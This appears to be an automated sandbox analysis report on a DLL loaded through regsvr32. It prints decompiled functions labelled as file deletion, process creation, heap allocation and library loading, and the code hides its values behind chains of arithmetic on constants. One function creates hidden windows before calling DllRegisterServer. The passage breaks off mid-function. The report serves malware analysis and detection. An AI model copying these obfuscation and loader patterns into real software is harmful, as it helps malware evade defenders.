                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: !P8$VN$hJ(
                                                                                                                • API String ID: 4033686569-2871701308
                                                                                                                • Opcode ID: 4f98732424392c0c2d40a08f65a489f976b5ac1c226d2be1ed55e77615b59a04
                                                                                                                • Instruction ID: 09fa8d3f1e7d30cc4c409970629495df703218e53dde755919db83391e5b6915
                                                                                                                • Opcode Fuzzy Hash: 4f98732424392c0c2d40a08f65a489f976b5ac1c226d2be1ed55e77615b59a04
                                                                                                                • Instruction Fuzzy Hash: 055112B5D01209EBCF08DFE1D98A9EEFBB2FB44318F208159E415B6260D7B91A45CF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001A4B40(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				short _v108;
                                                                                                                				char* _v112;
                                                                                                                				char* _v116;
                                                                                                                				signed int _v120;
                                                                                                                				char _v124;
                                                                                                                				char _v644;
                                                                                                                				char _v1164;
                                                                                                                				void* _t216;
                                                                                                                				signed int _t250;
                                                                                                                				signed int _t254;
                                                                                                                				signed int _t255;
                                                                                                                				signed int _t256;
                                                                                                                				signed int _t257;
                                                                                                                				signed int _t258;
                                                                                                                				void* _t283;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t283 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t216);
                                                                                                                				_v76 = 0xaf4913;
                                                                                                                				_v76 = _v76 | 0x60f784be;
                                                                                                                				_v76 = _v76 ^ 0x60ffcdbe;
                                                                                                                				_v32 = 0x57379b;
                                                                                                                				_v32 = _v32 | 0xaf59af44;
                                                                                                                				_v32 = _v32 + 0xffff8ca1;
                                                                                                                				_t254 = 0x36;
                                                                                                                				_v32 = _v32 * 0xb;
                                                                                                                				_v32 = _v32 ^ 0x89184f94;
                                                                                                                				_v80 = 0xcfb11;
                                                                                                                				_v80 = _v80 + 0xbdcf;
                                                                                                                				_v80 = _v80 ^ 0x000db0e0;
                                                                                                                				_v28 = 0xfd31b5;
                                                                                                                				_v28 = _v28 << 0xe;
                                                                                                                				_v28 = _v28 / _t254;
                                                                                                                				_v28 = _v28 ^ 0xfe80419d;
                                                                                                                				_v28 = _v28 ^ 0xffeaeb6b;
                                                                                                                				_v12 = 0x49fee0;
                                                                                                                				_v12 = _v12 + 0xc9e1;
                                                                                                                				_v12 = _v12 | 0xbdbdcfb5;
                                                                                                                				_v12 = _v12 ^ 0xbdf05a1e;
                                                                                                                				_v88 = 0x87b4f4;
                                                                                                                				_t255 = 0x76;
                                                                                                                				_v88 = _v88 * 0x25;
                                                                                                                				_v88 = _v88 ^ 0x1395f76f;
                                                                                                                				_v48 = 0x9e334f;
                                                                                                                				_v48 = _v48 | 0xc2b0d8fa;
                                                                                                                				_v48 = _v48 << 5;
                                                                                                                				_v48 = _v48 ^ 0x57d078bc;
                                                                                                                				_v72 = 0x850a78;
                                                                                                                				_v72 = _v72 + 0xffff66f0;
                                                                                                                				_v72 = _v72 ^ 0x00822119;
                                                                                                                				_v20 = 0x81aa36;
                                                                                                                				_v20 = _v20 << 8;
                                                                                                                				_v20 = _v20 * 0x16;
                                                                                                                				_v20 = _v20 << 5;
                                                                                                                				_v20 = _v20 ^ 0x941c2512;
                                                                                                                				_v56 = 0x8dee13;
                                                                                                                				_v56 = _v56 + 0xffff9353;
                                                                                                                				_v56 = _v56 * 0x77;
                                                                                                                				_v56 = _v56 ^ 0x41c94d87;
                                                                                                                				_v36 = 0xab9045;
                                                                                                                				_v36 = _v36 + 0xffffe85f;
                                                                                                                				_v36 = _v36 >> 0xc;
                                                                                                                				_v36 = _v36 << 5;
                                                                                                                				_v36 = _v36 ^ 0x0006e00e;
                                                                                                                				_v64 = 0x715e1c;
                                                                                                                				_v64 = _v64 ^ 0xef49fb00;
                                                                                                                				_v64 = _v64 / _t255;
                                                                                                                				_v64 = _v64 ^ 0x020301c9;
                                                                                                                				_v84 = 0xb0c597;
                                                                                                                				_v84 = _v84 ^ 0x4e283637;
                                                                                                                				_v84 = _v84 ^ 0x4e9e9227;
                                                                                                                				_v8 = 0x778c1c;
                                                                                                                				_v8 = _v8 >> 7;
                                                                                                                				_v8 = _v8 + 0x22a3;
                                                                                                                				_v8 = _v8 * 0x34;
                                                                                                                				_v8 = _v8 ^ 0x00383d2b;
                                                                                                                				_v52 = 0xae62ff;
                                                                                                                				_v52 = _v52 + 0xe5b4;
                                                                                                                				_t256 = 0x68;
                                                                                                                				_v52 = _v52 / _t256;
                                                                                                                				_v52 = _v52 ^ 0x00077a24;
                                                                                                                				_v44 = 0x3255f7;
                                                                                                                				_v44 = _v44 + 0xa2a3;
                                                                                                                				_v44 = _v44 ^ 0x9121dbdd;
                                                                                                                				_v44 = _v44 ^ 0x911f2133;
                                                                                                                				_v24 = 0xf6365f;
                                                                                                                				_t257 = 0x18;
                                                                                                                				_v24 = _v24 * 0x4a;
                                                                                                                				_v24 = _v24 + 0xffff6e91;
                                                                                                                				_v24 = _v24 | 0x0936ea02;
                                                                                                                				_v24 = _v24 ^ 0x4f3fc56e;
                                                                                                                				_v16 = 0xd0ae6b;
                                                                                                                				_t258 = 0x3a;
                                                                                                                				_v16 = _v16 / _t257;
                                                                                                                				_v16 = _v16 | 0x3e61c6a3;
                                                                                                                				_v16 = _v16 + 0xffff2182;
                                                                                                                				_v16 = _v16 ^ 0x3e604d19;
                                                                                                                				_v92 = 0xc8a9e6;
                                                                                                                				_v92 = _v92 | 0x9bdeaf4e;
                                                                                                                				_v92 = _v92 ^ 0x9bd016e5;
                                                                                                                				_v60 = 0x57a84f;
                                                                                                                				_v60 = _v60 << 0xa;
                                                                                                                				_v60 = _v60 + 0x8968;
                                                                                                                				_v60 = _v60 ^ 0x5ea1fc3a;
                                                                                                                				_v40 = 0x5c3bdd;
                                                                                                                				_v40 = _v40 + 0x1772;
                                                                                                                				_v40 = _v40 / _t258;
                                                                                                                				_v40 = _v40 ^ 0x2a9ddb86;
                                                                                                                				_v40 = _v40 ^ 0x2a91f2bc;
                                                                                                                				_v68 = 0x8370ee;
                                                                                                                				_v68 = _v68 >> 9;
                                                                                                                				_v68 = _v68 >> 0xc;
                                                                                                                				_v68 = _v68 ^ 0x0006b114;
                                                                                                                				E001B25CD(_v28, _v12, 0x1e, _v88,  &_v124);
                                                                                                                				E001B25CD(_v48, _v72, 0x208, _v20,  &_v644);
                                                                                                                				E001B25CD(_v56, _v36, 0x208, _v64,  &_v1164);
                                                                                                                				_t197 =  &_v8; // 0x383d2b
                                                                                                                				E001A91F2(_v84,  *_t197, _v52, _a4, _v44,  &_v644);
                                                                                                                				E001A91F2(_v24, _v16, _v92, _t283, _v60,  &_v1164);
                                                                                                                				_v120 = _v76;
                                                                                                                				_v116 =  &_v644;
                                                                                                                				_v112 =  &_v1164;
                                                                                                                				_v108 = _v80 | _v32 | 0x00000410;
                                                                                                                				_t250 = E001B7DA0(_v40,  &_v124, _v68); // executed
                                                                                                                				asm("sbb eax, eax");
                                                                                                                				return  ~_t250 + 1;
                                                                                                                			}








































                                                                                                                0x001a4c87
                                                                                                                0x001a4c8e
                                                                                                                0x001a4c9a
                                                                                                                0x001a4c9d
                                                                                                                0x001a4ca4
                                                                                                                0x001a4cab
                                                                                                                0x001a4cb2
                                                                                                                0x001a4cb9
                                                                                                                0x001a4cc0
                                                                                                                0x001a4cc4
                                                                                                                0x001a4ccf
                                                                                                                0x001a4cd2
                                                                                                                0x001a4cd9
                                                                                                                0x001a4ce0
                                                                                                                0x001a4cee
                                                                                                                0x001a4cf3
                                                                                                                0x001a4cf8
                                                                                                                0x001a4cff
                                                                                                                0x001a4d06
                                                                                                                0x001a4d0d
                                                                                                                0x001a4d14
                                                                                                                0x001a4d1b
                                                                                                                0x001a4d26
                                                                                                                0x001a4d29
                                                                                                                0x001a4d2c
                                                                                                                0x001a4d33
                                                                                                                0x001a4d3a
                                                                                                                0x001a4d41
                                                                                                                0x001a4d4d
                                                                                                                0x001a4d4e
                                                                                                                0x001a4d53
                                                                                                                0x001a4d5a
                                                                                                                0x001a4d61
                                                                                                                0x001a4d68
                                                                                                                0x001a4d6f
                                                                                                                0x001a4d76
                                                                                                                0x001a4d7d
                                                                                                                0x001a4d84
                                                                                                                0x001a4d88
                                                                                                                0x001a4d8f
                                                                                                                0x001a4d96
                                                                                                                0x001a4d9d
                                                                                                                0x001a4da9
                                                                                                                0x001a4daf
                                                                                                                0x001a4db6
                                                                                                                0x001a4dbd
                                                                                                                0x001a4dc4
                                                                                                                0x001a4dc8
                                                                                                                0x001a4dcc
                                                                                                                0x001a4ddf
                                                                                                                0x001a4dfa
                                                                                                                0x001a4e10
                                                                                                                0x001a4e25
                                                                                                                0x001a4e2b
                                                                                                                0x001a4e47
                                                                                                                0x001a4e52
                                                                                                                0x001a4e5b
                                                                                                                0x001a4e64
                                                                                                                0x001a4e78
                                                                                                                0x001a4e7c
                                                                                                                0x001a4e86
                                                                                                                0x001a4e8e

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: +=8$76(N
                                                                                                                • API String ID: 3080627654-1438774008
                                                                                                                • Opcode ID: 1db2f9c43d7fe5329084669e1915b1fd4bcac671b522587addb6cecd1a5ce235
                                                                                                                • Instruction ID: b3ac722914aca84fd3b03b61ecb27d3b7be9c2aa2742dd19d200f7d965ac84c8
                                                                                                                • Opcode Fuzzy Hash: 1db2f9c43d7fe5329084669e1915b1fd4bcac671b522587addb6cecd1a5ce235
                                                                                                                • Instruction Fuzzy Hash: 84A10EB5C0131DABDF58CFE0D98A8DEBBB1FB44318F208159E512BA260E7B45A49CF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E001B4E54(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				intOrPtr _v84;
                                                                                                                				char _v88;
                                                                                                                				char _v156;
                                                                                                                				void* _t156;
                                                                                                                				void* _t170;
                                                                                                                				signed int _t177;
                                                                                                                				signed int _t178;
                                                                                                                				signed int _t179;
                                                                                                                				signed int _t180;
                                                                                                                				intOrPtr _t197;
                                                                                                                				void* _t198;
                                                                                                                
                                                                                                                				_push(_a28);
                                                                                                                				_t197 = _a8;
                                                                                                                				_t198 = __edx;
                                                                                                                				_push(0);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_t197);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t156);
                                                                                                                				_v40 = 0x8b4c58;
                                                                                                                				_v40 = _v40 + 0x3f86;
                                                                                                                				_v40 = _v40 ^ 0x0082ad4e;
                                                                                                                				_v72 = 0x63ffc4;
                                                                                                                				_v72 = _v72 + 0xffd;
                                                                                                                				_v72 = _v72 ^ 0x00606d7d;
                                                                                                                				_v20 = 0x648a46;
                                                                                                                				_t177 = 0x59;
                                                                                                                				_v20 = _v20 / _t177;
                                                                                                                				_v20 = _v20 + 0xffff461a;
                                                                                                                				_v20 = _v20 ^ 0x0006794c;
                                                                                                                				_v12 = 0x98a9f4;
                                                                                                                				_v12 = _v12 | 0x13bbb8d1;
                                                                                                                				_v12 = _v12 + 0xffffa770;
                                                                                                                				_v12 = _v12 + 0xffff8581;
                                                                                                                				_v12 = _v12 ^ 0x13b5c991;
                                                                                                                				_v48 = 0x38418a;
                                                                                                                				_v48 = _v48 >> 0x10;
                                                                                                                				_v48 = _v48 ^ 0x000154a6;
                                                                                                                				_v44 = 0xc8a2b4;
                                                                                                                				_v44 = _v44 + 0xbd91;
                                                                                                                				_v44 = _v44 ^ 0x00ca080f;
                                                                                                                				_v60 = 0xcded71;
                                                                                                                				_t178 = 0x4e;
                                                                                                                				_v60 = _v60 * 0x1e;
                                                                                                                				_v60 = _v60 ^ 0x1827e9c1;
                                                                                                                				_v68 = 0x803c26;
                                                                                                                				_v68 = _v68 ^ 0x63fbc15d;
                                                                                                                				_v68 = _v68 ^ 0x637bcf1b;
                                                                                                                				_v24 = 0x289a39;
                                                                                                                				_v24 = _v24 << 4;
                                                                                                                				_v24 = _v24 + 0xffff7bb8;
                                                                                                                				_v24 = _v24 ^ 0x028e7e6c;
                                                                                                                				_v52 = 0x412de9;
                                                                                                                				_v52 = _v52 + 0x5e90;
                                                                                                                				_v52 = _v52 ^ 0x004be294;
                                                                                                                				_v32 = 0x94c3a9;
                                                                                                                				_v32 = _v32 | 0x0fecc031;
                                                                                                                				_v32 = _v32 + 0xffff9b05;
                                                                                                                				_v32 = _v32 ^ 0x0ffef52e;
                                                                                                                				_v28 = 0x44b86e;
                                                                                                                				_v28 = _v28 + 0xffff4ad6;
                                                                                                                				_v28 = _v28 << 5;
                                                                                                                				_v28 = _v28 ^ 0x088c7c61;
                                                                                                                				_v8 = 0x1102ec;
                                                                                                                				_v8 = _v8 << 2;
                                                                                                                				_v8 = _v8 ^ 0xeea5506c;
                                                                                                                				_v8 = _v8 + 0x37bd;
                                                                                                                				_v8 = _v8 ^ 0xeee8d4e0;
                                                                                                                				_v56 = 0x3afb12;
                                                                                                                				_v56 = _v56 / _t178;
                                                                                                                				_v56 = _v56 ^ 0x000dc862;
                                                                                                                				_v16 = 0x278;
                                                                                                                				_t179 = 0xe;
                                                                                                                				_v16 = _v16 / _t179;
                                                                                                                				_v16 = _v16 << 4;
                                                                                                                				_v16 = _v16 | 0xcf204b72;
                                                                                                                				_v16 = _v16 ^ 0xcf251045;
                                                                                                                				_v36 = 0xa5e031;
                                                                                                                				_t180 = 0x51;
                                                                                                                				_v36 = _v36 / _t180;
                                                                                                                				_v36 = _v36 ^ 0x1a3a5efb;
                                                                                                                				_v36 = _v36 ^ 0x1a36e331;
                                                                                                                				_v64 = 0x1d2bd;
                                                                                                                				_v64 = _v64 ^ 0xe4a507ac;
                                                                                                                				_v64 = _v64 ^ 0xe4adbaf3;
                                                                                                                				_t181 = _v40;
                                                                                                                				E001B25CD(_v40, _v72, 0x44, _v20,  &_v156);
                                                                                                                				_v156 = 0x44;
                                                                                                                				_t170 = E001A816B( &_v156, _v12, _v48, _v44, _v40, _v60, _v68, _t181, _v24, _t181, _a16, _t181, _v52, _v32,  &_v88, _a4, _t198); // executed
                                                                                                                				if(_t170 == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				if(_t197 == 0) {
                                                                                                                					E001B02D8(_v88, _v28, _v8, _v56);
                                                                                                                					E001B02D8(_v84, _v16, _v36, _v64);
                                                                                                                				} else {
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}
































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID: }m`$-A
                                                                                                                • API String ID: 963392458-3093481195
                                                                                                                • Opcode ID: 87e7d8104ef8cc2791b0dfc9e4b40d4090cb19fabad17ace80fb2e6409c610f3
                                                                                                                • Instruction ID: 44a9ba2d91a9e50ddad3a40d467fbda365e9b4dea385334552f3f9f53ab3ffbb
                                                                                                                • Opcode Fuzzy Hash: 87e7d8104ef8cc2791b0dfc9e4b40d4090cb19fabad17ace80fb2e6409c610f3
                                                                                                                • Instruction Fuzzy Hash: B57132B1C00209EFDF59DFE0C94A9EEBBB2FB08314F208149E516B6260D7B51A59CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001A303A(intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				void* _t63;
                                                                                                                
                                                                                                                				_v40 = _v40 & 0x00000000;
                                                                                                                				_v36 = _v36 & 0x00000000;
                                                                                                                				_v44 = 0xfda899;
                                                                                                                				_v28 = 0xb23799;
                                                                                                                				_v28 = _v28 + 0xffff542a;
                                                                                                                				_v28 = _v28 ^ 0x00b18bcb;
                                                                                                                				_v16 = 0xcc2eb1;
                                                                                                                				_v16 = _v16 + 0x140d;
                                                                                                                				_v16 = _v16 + 0xe157;
                                                                                                                				_v16 = _v16 ^ 0x00c8c1af;
                                                                                                                				_v12 = 0x2f1bcc;
                                                                                                                				_v12 = _v12 * 0x58;
                                                                                                                				_v12 = _v12 ^ 0x0ba208da;
                                                                                                                				_v12 = _v12 ^ 0x1b909a0d;
                                                                                                                				_v32 = 0x801efb;
                                                                                                                				_v32 = _v32 | 0x660ebd1c;
                                                                                                                				_v32 = _v32 ^ 0x66871f8f;
                                                                                                                				_v8 = 0x3c2a32;
                                                                                                                				_v8 = _v8 ^ 0x6845a1ec;
                                                                                                                				_v8 = _v8 >> 0xa;
                                                                                                                				_v8 = _v8 + 0xffffc82b;
                                                                                                                				_v8 = _v8 ^ 0x0016235f;
                                                                                                                				_v20 = 0xacccf8;
                                                                                                                				_v20 = _v20 ^ 0xc45fdca9;
                                                                                                                				_v20 = _v20 + 0xffff1486;
                                                                                                                				_v20 = _v20 ^ 0xc4f88220;
                                                                                                                				_v24 = 0x760d9f;
                                                                                                                				_v24 = _v24 >> 4;
                                                                                                                				_v24 = _v24 ^ 0x000770d7;
                                                                                                                				_t63 = E001A3506(_v32, _v8, E001B345B(), _a8, _v20, _v28, _v24); // executed
                                                                                                                				return _t63;
                                                                                                                			}















                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID: 2*<$W
                                                                                                                • API String ID: 1279760036-2887220841
                                                                                                                • Opcode ID: ebc570e0260719ffb43f7d75e55fb17aa819b37f5b8bab0ae8db23e12aeef9f6
                                                                                                                • Instruction ID: e83ea437900eea39fc09c1850f4a5aa8a55b3260706ee4e830488804c52254fe
                                                                                                                • Opcode Fuzzy Hash: ebc570e0260719ffb43f7d75e55fb17aa819b37f5b8bab0ae8db23e12aeef9f6
                                                                                                                • Instruction Fuzzy Hash: C921EDB2C0131EEBCF44DFE5C98A5EEBBB1BB10318F208188D81576260D3B90B599F81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001C1E49(void* __ecx, signed int __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _t103;
                                                                                                                				intOrPtr _t108;
                                                                                                                				signed int _t118;
                                                                                                                				signed int _t119;
                                                                                                                				signed int _t120;
                                                                                                                
                                                                                                                				_v52 = _v52 & 0x00000000;
                                                                                                                				_v56 = 0x7b893f;
                                                                                                                				_v24 = 0x7941d;
                                                                                                                				_v24 = _v24 | 0xfcbc9831;
                                                                                                                				_v24 = _v24 ^ 0xd93b5a3b;
                                                                                                                				_v24 = _v24 ^ 0x25863428;
                                                                                                                				_v20 = 0x17f4d9;
                                                                                                                				_v20 = _v20 + 0xb603;
                                                                                                                				_t118 = __edx;
                                                                                                                				_t119 = 0xb;
                                                                                                                				_v20 = _v20 / _t119;
                                                                                                                				_v20 = _v20 ^ 0x0007bd91;
                                                                                                                				_v16 = 0xfedb2c;
                                                                                                                				_v16 = _v16 + 0xffff9b1b;
                                                                                                                				_v16 = _v16 | 0x7dccd111;
                                                                                                                				_v16 = _v16 ^ 0x7df93b9c;
                                                                                                                				_v8 = 0xfa06c5;
                                                                                                                				_v8 = _v8 | 0xe70a8a77;
                                                                                                                				_v8 = _v8 + 0xffff57f1;
                                                                                                                				_v8 = _v8 | 0x4389081f;
                                                                                                                				_v8 = _v8 ^ 0xe7fa7ec9;
                                                                                                                				_v40 = 0x89cd06;
                                                                                                                				_v40 = _v40 << 3;
                                                                                                                				_v40 = _v40 ^ 0x04459330;
                                                                                                                				_v36 = 0x306a94;
                                                                                                                				_v36 = _v36 >> 0x10;
                                                                                                                				_v36 = _v36 ^ 0x000800bb;
                                                                                                                				_v32 = 0x4303d4;
                                                                                                                				_v32 = _v32 + 0xffffc166;
                                                                                                                				_v32 = _v32 ^ 0x004bd8c3;
                                                                                                                				_v28 = 0xc35dbb;
                                                                                                                				_v28 = _v28 + 0xffff2b1a;
                                                                                                                				_v28 = _v28 << 6;
                                                                                                                				_v28 = _v28 ^ 0x30aa85a8;
                                                                                                                				_v48 = 0x733cdc;
                                                                                                                				_v48 = _v48 << 0x10;
                                                                                                                				_v48 = _v48 ^ 0x3cd4e881;
                                                                                                                				_v12 = 0xc7c271;
                                                                                                                				_t120 = 0x51;
                                                                                                                				_v12 = _v12 * 0x7c;
                                                                                                                				_v12 = _v12 / _t120;
                                                                                                                				_v12 = _v12 | 0x6cb4213e;
                                                                                                                				_v12 = _v12 ^ 0x6db68ebc;
                                                                                                                				_v44 = 0xf83c0b;
                                                                                                                				_v44 = _v44 ^ 0x0c4208a3;
                                                                                                                				_v44 = _v44 ^ 0x0cbae11e;
                                                                                                                				_push(_v8);
                                                                                                                				_push(__ecx);
                                                                                                                				_push(_v16);
                                                                                                                				_t103 = E001A4A9D(_v40, E001BF5D9(_v24, _v20, _v44), _v36, _v32); // executed
                                                                                                                				_t108 =  *0x1c4210; // 0x6514d8
                                                                                                                				 *((intOrPtr*)(_t108 + 0x14 + _t118 * 4)) = _t103;
                                                                                                                				return E001BF94B(_t102, _v28, _v48, _v12, _v44);
                                                                                                                			}






















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: fc64d75d84e65bf520ae7a3c36e371424e9e7db499587eaa783adfdd386c487a
                                                                                                                • Instruction ID: 2a11169fe9f844493a4505571730a98cc366415580bd36bbf1f0769a31e4426f
                                                                                                                • Opcode Fuzzy Hash: fc64d75d84e65bf520ae7a3c36e371424e9e7db499587eaa783adfdd386c487a
                                                                                                                • Instruction Fuzzy Hash: 0A410EB5D01219EBDF44DFE5C98A5EEBFB1FB48314F208149D912B6260C3B50A46CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10008B40() {
                                                                                                                				struct HWND__* _t3;
                                                                                                                				int _t4;
                                                                                                                
                                                                                                                				if(CreateWindowExW(0x3db, L"MainConsole", L"FormClass", 0x38, 0x156, 0x22b7, 0x7b, 0x379, 0, 0, 0, 0) == 0) {
                                                                                                                					GetLastError();
                                                                                                                				}
                                                                                                                				ShowWindow(0, 0); // executed
                                                                                                                				_t3 = CreateWindowExA(0x298, "StartForme", "One Click", 0x60, 0x1bb, 0x1a11, 1, 0x379, 0, 0, 0, 0); // executed
                                                                                                                				if(_t3 != 0) {
                                                                                                                					ShowWindow(0, 0);
                                                                                                                				}
                                                                                                                				_t4 =  *0x1006f044; // 0x6419c8
                                                                                                                				if(_t4 == 0) {
                                                                                                                					ExitProcess(_t4);
                                                                                                                				}
                                                                                                                				_push("DllRegisterServer");
                                                                                                                				_push(_t4);
                                                                                                                				 *((intOrPtr*)(E10008380()))(); // executed
                                                                                                                				return 0;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32 ref: 10008B6A
                                                                                                                • GetLastError.KERNEL32 ref: 10008B74
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10008B85
                                                                                                                • CreateWindowExA.USER32 ref: 10008BB1
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10008BBF
                                                                                                                • ExitProcess.KERNEL32 ref: 10008BCC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow$ErrorExitLastProcess
                                                                                                                • String ID: DllRegisterServer$FormClass$MainConsole$One Click$StartForme
                                                                                                                • API String ID: 356722023-2283933193
                                                                                                                • Opcode ID: 181e8cfece939c6a5b0c2741fce88801048a0eca096d6e8e4d2ba9673e7e7e6d
                                                                                                                • Instruction ID: ec2ba97d3f5162f2acf2e910e2fcad84b18f71ae29f693a90e351d4cbeecfad5
                                                                                                                • Opcode Fuzzy Hash: 181e8cfece939c6a5b0c2741fce88801048a0eca096d6e8e4d2ba9673e7e7e6d
                                                                                                                • Instruction Fuzzy Hash: CF01E7757C8324BAF6719BA46C8BF862A98AB48F81F110001F749FE0D5EBD0B6049669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1002D2C7() {
                                                                                                                				struct _CRITICAL_SECTION* _v4;
                                                                                                                				char _v28;
                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _v56;
                                                                                                                				void* __ebx;
                                                                                                                				intOrPtr __ecx;
